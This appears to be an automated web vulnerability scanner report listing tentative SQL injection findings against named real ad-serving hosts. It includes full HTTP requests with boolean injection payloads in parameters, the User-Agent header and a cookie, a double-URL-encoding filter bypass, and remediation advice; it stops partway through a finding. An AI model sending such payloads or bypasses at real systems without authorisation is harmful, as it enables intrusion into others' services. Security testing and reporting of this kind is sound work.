Path Traversal, SQL Injection, HTTP Header Injection, Reflected XSS, DORK, GHDB, Report

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12883928'%20or%201%3d1--%20 and 12883928'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUlVo69RiZ0jqNPgQ_eE4qd7lFX20AAAtmYASPTEpRhaPmmXNtd4EAAAEvZiQJWw--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:28 GMT; Path=/
Set-Cookie: UA=AAAAAQAUshtdxv8Nep7WiQfS0VXCFGEDCiEDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FMxrIBgPf1fUglQwsIYwgCiwZA5ECACQyB7o-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2985
Date: Mon, 18 Apr 2011 01:05:27 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUCuHqA1IVXQFhIjgDP1QN0ssCPz5nZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MjcxNzg0MTU_LGMsMzIxNjExLHBjLDc2Mjg5LGFjLDE1MTM1NCxvLE4wLVMwLGwsNTM5ODQscGNsaWNrLGh0dHA6Ly9hZC5hZnkxMS5uZXQvYWQ_Yz1QdnpCM3E1NHVVMjJ6N2lKcWdld1RqZ1RENHlKZjdtVVFrZVVGeFo3VWpmOGtWdWllTHpnZTlGalpnT0hmaTVsWENZbkIwYTVXamQxb1VtSUZDUXJjdjNnK0ZNR0w0dVRXSGtPQ2ZLMEExZz0hJjExMjg4MzkyOCcgb3IgMT0xLS0gPTEK&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=27178415?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=2115406896" s
...[SNIP]...

Request 2

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUTv4f.4AvYNPTpLkaenGPTHc02R4AAKsTJuN7gksypS.cOSoSGLwAAAEvZiQOFg--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:29 GMT; Path=/
Set-Cookie: UA=AAAAAQAUq2Z2XwOQwbbOy0ZJvKPLhf0xgaYDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FTwzIBgPf1fUglQwsIYwgCiwpDpECABl8Bzo-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2995
Date: Mon, 18 Apr 2011 01:05:29 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUu1LCr3inDmUp5YA3h7ihYNKcGZlnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MTczNDc5NzY0Nj8sYywzMjE2MTEscGMsNzYyODksYWMsMTUxMzU0LG8sTjAtUzAsbCw1Mzk4NCxwY2xpY2ssaHR0cDovL2FkLmFmeTExLm5ldC9hZD9jPVB2ekIzcTU0dVUyMno3aUpxZ2V3VGpnVEQ0eUpmN21VUWtlVUZ4WjdVamY4a1Z1aWVMemdlOUZqWmdPSGZpNWxYQ1luQjBhNVdqZDFvVW1JRkNRcmN2M2crRk1HTDR1VFdIa09DZkswQTFnPSEmMTEyODgzOTI4JyBvciAxPTItLSA9MQo-&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=1734797646?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=178
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/ [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/martindale.ll.stateresults.dart/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10164584'%20or%201%3d1--%20 and 10164584'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/martindale.ll.stateresults.dart/;sz=468x60;pa=;country=65;ord=717285;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers.htm?n=4294962592&dv=add|City^Birmingham&c=D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.1610164584'%20or%201%3d1--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 05:25:10 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 1527
X-XSS-Protection: 1; mode=block

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div id="srBorder" style="width: 583px; height: 50px; background-color: #FFFFFF; border-color: #
...[SNIP]...
<a id="srLink" href="http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBJ2zPtr-vTeLZKsH7lQfCq5GXDPuh3Y4CAAAAEAEgADgAWJvw25EmYMkGggEXY2EtcHViLTAwNDk0NDUyNzA3NjU5NTSyARJ3d3cubWFydGluZGFsZS5jb226AQk0Njh4NjBfYXPIAQnaAWNodHRwOi8vd3d3Lm1hcnRpbmRhbGUuY29tL2FsbC9jLWVuZ2xhbmQvYWxsLWxhd3llcnMuaHRtP249NDI5NDk2MjU5MiZkdj1hZGQlN0NDaXR5JTVFQmlybWluZ2hhbSZjPUTAAgLgAgDqAiQzMDc4L21hcnRpbmRhbGUubGwuc3RhdGVyZXN1bHRzLmRhcnT4AvDRHpAD0AWYA-ADqAMB0ASQTuAEAQ%26num%3D0%26sig%3DAGiWqtx6C5m65EkogUqVZwlEh59IShH2ag%26client%3Dca-pub-0049445270765954%26adurl%3Dhttp://www.mhur.com" style="color: #006699; text-decoration: none;" onmouseover="this.style.color='#817156';" onmouseout="this.style.color='#006699';" target="_blank"><font id="srTitle" style="font-family: Verdana; font-size: 11px; font-weight: bold; text-decoration: underline;">Showcase Your Peer Review Rating With Peer Review Rating Acknowledgements</font><br><font id="srText" style="font-family: Verdana; font-size: 10px; color: #333333; text-decoration: none;">LexisNexis Martindale-Hubbell knows the success of your firm depends on how your clients perceive your skills and ethical standards. Showcase expertise while giving back to the legal community.</font></a></div></div></body></html>

Request 2

GET /adi/martindale.ll.stateresults.dart/;sz=468x60;pa=;country=65;ord=717285;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers.htm?n=4294962592&dv=add|City^Birmingham&c=D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.1610164584'%20or%201%3d2--%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 05:25:11 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 1498
X-XSS-Protection: 1; mode=block

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div id="srBorder" style="width: 583px; height: 50px; background-color: #FFFFFF; border-color: #
...[SNIP]...
<a id="srLink" href="http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBz-kEt7-vTeDjLIfPlQe25OSsDIug3Y4CAAAAEAEgADgAWKPg25EmYMkGggEXY2EtcHViLTAwNDk0NDUyNzA3NjU5NTSyARJ3d3cubWFydGluZGFsZS5jb226AQk0Njh4NjBfYXPIAQnaAWNodHRwOi8vd3d3Lm1hcnRpbmRhbGUuY29tL2FsbC9jLWVuZ2xhbmQvYWxsLWxhd3llcnMuaHRtP249NDI5NDk2MjU5MiZkdj1hZGQlN0NDaXR5JTVFQmlybWluZ2hhbSZjPUTAAgLgAgDqAiQzMDc4L21hcnRpbmRhbGUubGwuc3RhdGVyZXN1bHRzLmRhcnT4AvDRHpAD0AWYA-ADqAMB0ASQTuAEAQ%26num%3D0%26sig%3DAGiWqtwn2J4wUhTJGnC21zshwjSfjr51yg%26client%3Dca-pub-0049445270765954%26adurl%3Dhttp://www.martindale-hubbell.co.uk/premier-partners" style="color: #006699; text-decoration: none;" onmouseover="this.style.color='#817156';" onmouseout="this.style.color='#006699';" target="_blank"><font id="srTitle" style="font-family: Verdana; font-size: 11px; font-weight: bold; text-decoration: underline;">Climber. Leader. Lawyer.</font><br><font id="srText" style="font-family: Verdana; font-size: 10px; color: #333333; text-decoration: none;">Premier Partner Profiles: A new service from LexisNexis that provides insights into premier partners' current role, formative experiences, management style and industry experience.</font></a></div></div></body></html>

1.3. http://googleads.g.doubleclick.net/pagead/ads [id cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the id cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u%2527

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 21-Apr-2011 09:13:25 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:58:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 12241
X-XSS-Protection: 1; mode=block
Expires: Thu, 21 Apr 2011 08:58:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtwCyXCJCKefmS-gRlsaaPdNT_ADpg&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 21-Apr-2011 09:13:26 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:58:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 12459
X-XSS-Protection: 1; mode=block
Expires: Thu, 21 Apr 2011 08:58:26 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.4. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The lmt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lmt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345'&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345''&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.5. http://googleads.g.doubleclick.net/pagead/ads [output parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the output request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

